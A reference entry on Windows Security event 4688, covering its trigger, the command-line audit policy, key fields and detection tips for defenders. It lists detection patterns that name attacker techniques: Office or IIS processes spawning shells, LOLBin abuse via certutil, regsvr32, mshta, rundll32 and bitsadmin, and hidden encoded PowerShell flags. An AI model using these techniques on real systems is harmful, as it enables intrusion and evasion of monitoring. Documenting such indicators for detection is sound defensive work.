4688 A new process has been created
Written every time a new process starts. Because it keeps the executable path, the parent process, and (if configured) the command line, it is one of the most important events for catching attack execution.
Overview
The subcategory is Audit Process Creation. It is generated whenever a process is created, recording the new process path (New Process Name), the creating process (Creator Process Name), and the executing account. By default the command-line arguments are not recorded, but enabling the Group Policy “Include command line in process creation events” adds Process Command Line and greatly improves detection capability.
How it is triggered
- Any process start. It appears for applications, scripts, and OS-internal activity alike.
- Command-line recording requires, in addition to Success auditing for Audit Process Creation, enabling
ProcessCreationIncludeCmdLine_Enabled(the GPO above).
Security review points
- Parent-child relationship: detect suspicious launch chains by the pair of
Creator Process Name(parent) andNew Process Name(child). For example,winword.exespawningpowershell.exe, orw3wp.exespawningcmd.exe, are improbable pairs that signal compromise. - LOLBins (living-off-the-land binaries): track abuse of built-in OS tools, such as
certutil.exedownloading files,regsvr32.exerunning remote scripts, and suspicious use ofmshta/rundll32/bitsadmin. - Command line: look in
Process Command Linefor encoded PowerShell (-enc), obfuscation, stealth options like-nop -w hidden, and external URLs. - Also evaluate the executing account and the path (outside standard folders or in a temp folder).
Notes for log review
- Every process start appears, so the volume is enormous. It is unmanageable unless distilled, in a SIEM, into correlation rules using parent-child, command line, and path.
- A blank command line likely means the GPO above is not configured. Confirm the setting as a prerequisite for detection.
- The command line can contain sensitive data such as passwords, so handle it carefully during collection and retention.
- Its role overlaps with EDR and Sysmon Event ID 1 (process creation). When both exist, reconcile them; when only 4688 exists, be sure to enable the command-line setting.
Key fields
| Field | Meaning |
|---|---|
New Process Name | The full path of the started process |
Creator Process Name | The parent (creating) process; available on Windows 10 and later |
Process Command Line | The command-line arguments (only when the GPO is enabled) |
Subject\Account Name | The account that started the process |
Token Elevation Type | The elevation state (whether an administrator token) |
Glossary
- LOLBins (Living Off the Land Binaries) — abusing legitimate tools already present in the OS. It lets attackers operate without dropping new malware and evades detection more easily.